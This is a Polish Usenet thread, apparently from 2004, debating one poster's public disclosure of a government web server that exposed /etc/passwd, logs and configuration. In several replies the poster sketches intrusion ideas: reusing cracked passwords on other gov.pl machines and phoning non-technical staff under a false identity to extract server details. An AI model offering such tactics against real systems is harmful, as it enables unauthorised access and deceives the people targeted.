+ Programy. | e-mail: zy...@zymen.net
+ Strony www. | www: http://zymen.net
+ Atrakcyjne ceny. | gg: 5211589
+ Szybko. Tanio. Pewnie. | tel. +48 691544955
zYm3N
>> 2. W pliku /etc/passwd leżały luzem zakodowane hasła.. brute force w takim
>> wypadku to kwestia czasu.
>>
>> Jeśli obronisz się z tego ostatniego, i udowodnisz, że pokazywanie na
>> zewnątrz haseł nie jest *poważną* dziurą w bezpieczeństwie systemu..
>> no to sory..
>
> W jaki sposób chciałbyś się zalogować na tą maszynę? Konkretnie.
Nie skanowałem maszyny, bo to *może* być - nie znam naszego prawa, a
przynajmniej tych jego paragrafów - uznane za próbę ataku..
Wolę nie.
Jeśli miałbym spekulować:
poszukałbym otwartych portów, wykorzystał hasła, które już ktoś rozkodował
(hasło == login). Jeśli nie to, to poszukałbym innego konta administratora
systemu. Duża szansa, że hasło takie samo.. Jeśli nie to.. poszukałbym
innego rozwiązania. Aczkolwiek masz rację w tym, do czego dążysz. Istnieje
szansa, że mimo tej dziury nie udałoby mi się zrobić kompletnie nic. Masz
rację.
zYm3N
>> Dlaczego próba naprawienia czegoś, szukania pomocy, spotyka się z takim
>> odrzuceniem i potępieniem przez społeczeństwo ?
>
> Może dlatego, że błąd, który wykorzystałeś opisany jest od lat czterech?
?
Gdzie ?
zYm3N
>> Dlaczego próba naprawienia czegoś, szukania pomocy, spotyka się z
>> takim odrzuceniem i potępieniem przez społeczeństwo ?
>> Jak Wy byście zareagowali ?
>
> Nie spoleczenstwo - nie uogolniaj
Przepraszam.
zYm3N
>> "Kto używa słowa lamer na określenie innej osoby sam się nim staje.."
>
> Gdzie to wyczytałeś?
Czy to istotne ?
"najtrudniej nauczyć się tego, że nawet głupi ma rację.."
Jak dla mnie te słowa są dość ważne. Za dużo aktualnie używa się słowa
'lamer'.. A tutaj odebrałem to jako nadużycie.
zYm3N
>>> "Kto używa słowa lamer na określenie innej osoby sam się nim staje.."
>
>> Gdzie to wyczytałeś?
>
> Tam zaraz wyczytał... nigdy do przedszkola nie chodziłeś, nie
> pamiętasz?
>
> "Kto się sam przezywa, ten się sam nazywa" - ostatnia deska ratunku
> gdy już komuś w zabawie w przezywanie weny brakło :>
A kolega trolluje w podziemiu i szuka postów do zaczepki.. fajno :] Każdy
robi to co lubi, albo to co umie..
zYm3N
>> Bo to serwer krajowy. Lubię pomagać. No i domenka gov.pl :] Mała mgiełka
>> tajemnicy :-)
>
> Wydoroślej.
Staram się.
> Już nawet pomijając wszystko inne, w jaki sposób chciałbyś przejąć
> kontrolę nad tym serwerem? Zalogować się na roota? A jak się niby
> zalogujesz? Wrzucić jakieś pliki? Nadal pytam - w jaki sposób? Tam
> i tak nie ma nic tajemniczego, co mogło wyciec a nie powinno, więc
> cała sprawa jest jak dla mnie próbą zaistnienia z twojej strony.
Czy gdybyś dokonywał audytu bezpieczeństwa serwera z taką dziurą
określiłbyś go jako bezpieczny ? Wydaje mi się, że nie. A jeśli tak, to ja
u Ciebie audytów robił nie będę..
Tu nie chodzi o to, że tam nie ma nic tajemniczego. Chodzi o zasadę. Chodzi
o to, że to jest serwer "Państwowy" i powinien być zabezpieczony. O to mi
chodzi. Próba zaistnienia z mojej strony byłaby wtedy, gdybym wysłał tego
posta przed wysłaniem maila do administratora.
Mogłem także otrzymać pieniądze za super artykuł w SE lub Fakt.. Oni za
takie perełki płacą nawet około 1000 zł.. Dla mnie, osoby aktualnie nie
zarabiającej dużo byłaby to niezła sumka.. Gdybym na Twojej stronie znalazł
błąd i powiadomił Cię o tym, tez byś tak odpowiedział ? "I tak się nie
zalogujesz, to po co będę to naprawiał" ?
ps. Korzystasz z:
a) przeglądarki Twojej produkcji
b) zmieniasz nagłówki requestów
c) ustawiasz sobie opcje w przeglądarce
?
Tak z czystej ciekawości :-)
Robert Rędziak (prawdziwego adresu szukaj w sygnaturce)
<ma...@nospam.aster.pl> wrote:
> A czy pokazywanie na zewnatrz zawartosci plikow z logami oraz
> konfiguracji serwera stanowi zagrozenie dla bezpieczenstwa czy tez
> nie?
Jeśli właściciel ma takie życzenie (np. po to, żeby zleciało się
całe harcerstwo z okolicy), to nie stanowi.
r.
--
_________________________________________________________________
robert rędziak K11 jid:rekin-at-jabber-dot-plukwa-dot-net
KlubSubaru.PL mailto:spambox-at-supersonic-dot-plukwa-dot-net
tu kieruj swój spam (tylko spam): fee...@supersonic.plukwa.net
Robert Rędziak (prawdziwego adresu szukaj w sygnaturce)
<ma...@nospam.aster.pl> wrote:
> W sumie informacje o konfiguracji sieci lokalnej, informacje o ruchu
> pocztowych, dane o tym kto, skad i kiedy sie logowal to nic waznego,
> tajemniczego i do niczego nikomu nie jest przydatne :-)
O tym, czy jest ważne, przydatne i tajemnicze, decyduje
właściciel.
zYm3N
>> A kolega trolluje w podziemiu i szuka postów do zaczepki.. fajno :]
>> Każdy robi to co lubi, albo to co umie..
>
> "Kto używa słowa troll na określenie innej osoby, ten sam trollem się staje."
>
> MSPANC ;-)
Jak to było ? :> Czekaj, czekaj.. Mam !
"Lepsza sztuczna inteligencja, od naturalnej głupoty" :D
Paweł Goleń
zYm3N
>> Gdzie ?
>
> securityfocus.com?
Fakt, administrator - i to tak "poważnego" serwera - powinien czytać tego
typu newsy, albo mieć założoną subskrypcję np. na securiteam. Cóż.. IMHO:
to też tylko człowiek. Wiem ile tych wiadomości przychodzi codziennie i też
nie pamiętam wszystkich systemów, które są dziurawe.
Jakub K. Boguslaw
wrote:
>> A czy pokazywanie na zewnatrz zawartosci plikow z logami
>> oraz konfiguracji serwera stanowi zagrozenie dla bezpieczenstwa
>> czy tez nie?
>
>
>PS: To oczywiście artykuł z innego wątku i na inny temat,
> ale jako swego rodzaju komentarz, IMHO, może być.
Analogia dosyc odlegla... no chyba ze ten sejmowy serwer od lat bierze
udzial w tak krytycznym biznesowym procesie, ze nikt nie byl wstanie
go zalatac dopisujac te 2 czy 3 linijki do konfiguracji apacha.
quem
>
> Dlaczego próba naprawienia czegoś, szukania pomocy, spotyka się z takim
> odrzuceniem i potępieniem przez społeczeństwo ?
Niektórzy pewnie ci zazdroszczą, że sami na to nie wpadli :) gdybyś nie
nagłaśniał tak sprawy na niusach tylko zwrócił się do kompetentnej prasy
to mógłbyś odnieść ze swojego odkrycia nawet pewne korzyści.
--
Charlie was a chemist, But Charlie is no more.
What Charlie thought was H2O was H2SO4.
zYm3N
>> Dlaczego próba naprawienia czegoś, szukania pomocy, spotyka się z takim
>> odrzuceniem i potępieniem przez społeczeństwo ?
>
> Niektórzy pewnie ci zazdroszczą, że sami na to nie wpadli :) gdybyś nie
> nagłaśniał tak sprawy na niusach tylko zwrócił się do kompetentnej prasy
> to mógłbyś odnieść ze swojego odkrycia nawet pewne korzyści.
Po raz kolejny piszę, że zwróciłem się.. jednak admin nie zareagował.. -
nie to co teraz :-)
zYm3N
>> Jak to było ? :> Czekaj, czekaj.. Mam !
>
>> "Lepsza sztuczna inteligencja, od naturalnej głupoty" :D
>
> Nawiązując do naszej rozmowy na pl.pregierz na temat ciupcianka w ubranku
> lub bez, myślę, że jednak powinieneś jeszcze raz przemyśleć swoją postawę,
> bo brak tegoż bardzo wyraźnie odbija się na tym co robisz, mówisz, piszesz...
> Świat nie kończy się na dziurach w serwerach. Tak myslę... :-P
Wracając do naszego ciupciania, powiem tak: Kocham mój komputer bardziej
niż jakąkolwiek kobietę. Amen. :]
ps. Nie wysnuj z tego przypadkiem wniosków, że ciupciam z nim :D
/ps. Pomyśl, że kiedyś nasze dzieci będą czytały, jak to w młodym wieku
rozmawialiśmy i ciupcianiu.. hm :> ;P>
bacido
> Dnia Fri, 20 Aug 2004 14:04:46 +0000 (UTC), quem spłodził(a):
>
>
>>> Dlaczego próba naprawienia czegoś, szukania pomocy, spotyka się z takim
>>> odrzuceniem i potępieniem przez społeczeństwo ?
>>
>> Niektórzy pewnie ci zazdroszczą, że sami na to nie wpadli :) gdybyś nie
>> nagłaśniał tak sprawy na niusach tylko zwrócił się do kompetentnej prasy
>> to mógłbyś odnieść ze swojego odkrycia nawet pewne korzyści.
>
> Po raz kolejny piszę, że zwróciłem się.. jednak admin nie zareagował.. -
> nie to co teraz :-)
Ale po co zwracasz się do ladmina? Trzeba było od razu do jakiegoś pismaka
i najlepiej telefonicznie a nie emailem.
--
"Yow! Am I having fun yet?"
-- Zippy the Pinhead
Adam Wysocki
> Jesteś znany jako osoba zajmująca się bezpieczeństwem. Rzekłbym
> jeden z lepszych.
Wydaje ci się.
> Jak Ty byś się zachował ?
Napisałbym krótkiego maila do admina i zapomniał o sprawie. Nie moje
małpy, nie mój cyrk.
--
Adam Wysocki * Warszawa, Centrum * www.gophi.net * #tygryski @ efnet
GG 1234 * GSM +48508878856 * go...@linux.net.pl * go...@gadu-gadu.pl
gophi jesteś nienetetyczny (C) TheDude o moim podejściu do netykiety
Adam Wysocki
> Nie skanowałem maszyny, bo to *może* być - nie znam naszego prawa,
> a przynajmniej tych jego paragrafów - uznane za próbę ataku..
Nie może.
> poszukałbym otwartych portów,
80 i 8009, na obu to samo.
> wykorzystał hasła, które już ktoś rozkodował (hasło == login).
Jak?
> Jeśli nie to, to poszukałbym innego konta administratora systemu.
Jak?
> poszukałbym innego rozwiązania.
No właśnie, jakiego? Nie teoretyzujmy, mamy konkretną sytuację,
serwer (możliwe że honeypot) ze starym oprogramowaniem, na który
nie da się zalogować i możliwość odczytania z niego każdego pliku
dostępnego z usera, z którego prawami chodzi httpd, w tym passwd.
Nawet jeśli wyciągniesz z niego hasło roota, co z nim zrobisz?
> Istnieje szansa, że mimo tej dziury nie udałoby mi się zrobić
> kompletnie nic. Masz rację.
Otóż to. Myślę że admin wie o tej dziurze od dawna i gdyby na tej
maszynie były jakieś poufne dane, to dziura byłaby załatana już
dawno.
--
Adam Wysocki * Warszawa, Centrum * www.gophi.net * #tygryski @ efnet
GG 1234 * GSM +48508878856 * go...@linux.net.pl * go...@gadu-gadu.pl
zawsze musisz byc lepszy? <1088628...@clubby.tranx.one.pl> 2004
zYm3N
>> Jesteś znany jako osoba zajmująca się bezpieczeństwem. Rzekłbym
>> jeden z lepszych.
>
> Wydaje ci się.
W zasięgu Polski, wydaje mi się, że tak.
>> Jak Ty byś się zachował ?
>
> Napisałbym krótkiego maila do admina i zapomniał o sprawie. Nie moje
> małpy, nie mój cyrk.
No i tutaj się różnimy.
zYm3N
>> Nie skanowałem maszyny, bo to *może* być - nie znam naszego prawa,
>> a przynajmniej tych jego paragrafów - uznane za próbę ataku..
>
> Nie może.
Jak napisałem, nie znam naszego prawa w tych obszarach. Ty 'w tym siedzisz'
pewnie masz rację.
>> poszukałbym otwartych portów,
>
> 80 i 8009, na obu to samo.
Czyli ta droga odpada.
>> wykorzystał hasła, które już ktoś rozkodował (hasło == login).
>
> Jak?
Poszukał innego komputera z gov.pl i sprawdził login + hasło.. A tych z
gov.pl jest sporo.
>> Jeśli nie to, to poszukałbym innego konta administratora systemu.
>
> Jak?
Poczta, np. telefon do kogoś z gov.pl z prośbą o podanie nr ip sewera
pocztowego, bo DNS nie dochodzi/nie gra/nie pasuje.. do osoby, która na IT
się nie zna.. raczej będzie uprzejma.. koledze z gov.pl.. czemu nie pomóc ?
>> poszukałbym innego rozwiązania.
>
> No właśnie, jakiego? Nie teoretyzujmy, mamy konkretną sytuację,
> serwer (możliwe że honeypot) ze starym oprogramowaniem, na który
> nie da się zalogować i możliwość odczytania z niego każdego pliku
> dostępnego z usera, z którego prawami chodzi httpd, w tym passwd.
> Nawet jeśli wyciągniesz z niego hasło roota, co z nim zrobisz?
Jak powiedziałem, to jest hasło administratora. Tenże administrator na
pewno ma tez inne konta.. I jest szansa - mała, bo mała - że da się tam
zalogować z tym samym hasłem.
>> Istnieje szansa, że mimo tej dziury nie udałoby mi się zrobić
>> kompletnie nic. Masz rację.
>
> Otóż to. Myślę że admin wie o tej dziurze od dawna i gdyby na tej
> maszynie były jakieś poufne dane, to dziura byłaby załatana już
> dawno.
Dziwne... Jest dziura, jest zgłoszenie, admin śpi. Przyznam, że to zabawne.
Artur M. Piwko
Adam Wysocki <go...@studio.tpi.pl> screamed:
>> wykorzystał hasła, które już ktoś rozkodował (hasło == login).
>
> Jak?
>
Allegro? (-;
Artur
--
[ Artur M. Piwko vel Pipen :: AMP29-RIPE :: :: Member of Szwadrony Śmieci ]
[ :: :: Member of Inkwizytorzy :: Member of Lokalny Sąd Kapturowy :: :: ]
[ Member of Szeryfowie :: Member of Sępologiczni Adwersarze Spamu, Śmieciarze ]
Better be patient on the road than a patient in the hospital.
Lisu
>>> Jesteś znany jako osoba zajmująca się bezpieczeństwem. Rzekłbym
>>> jeden z lepszych.
>>
>> Wydaje ci się.
>
> W zasięgu Polski, wydaje mi się, że tak.
O której Polsce mówisz?
--
:: LiSU :: 6502, 680x0, x86 USER :: http://rudylis.com :: JMP $E477 ::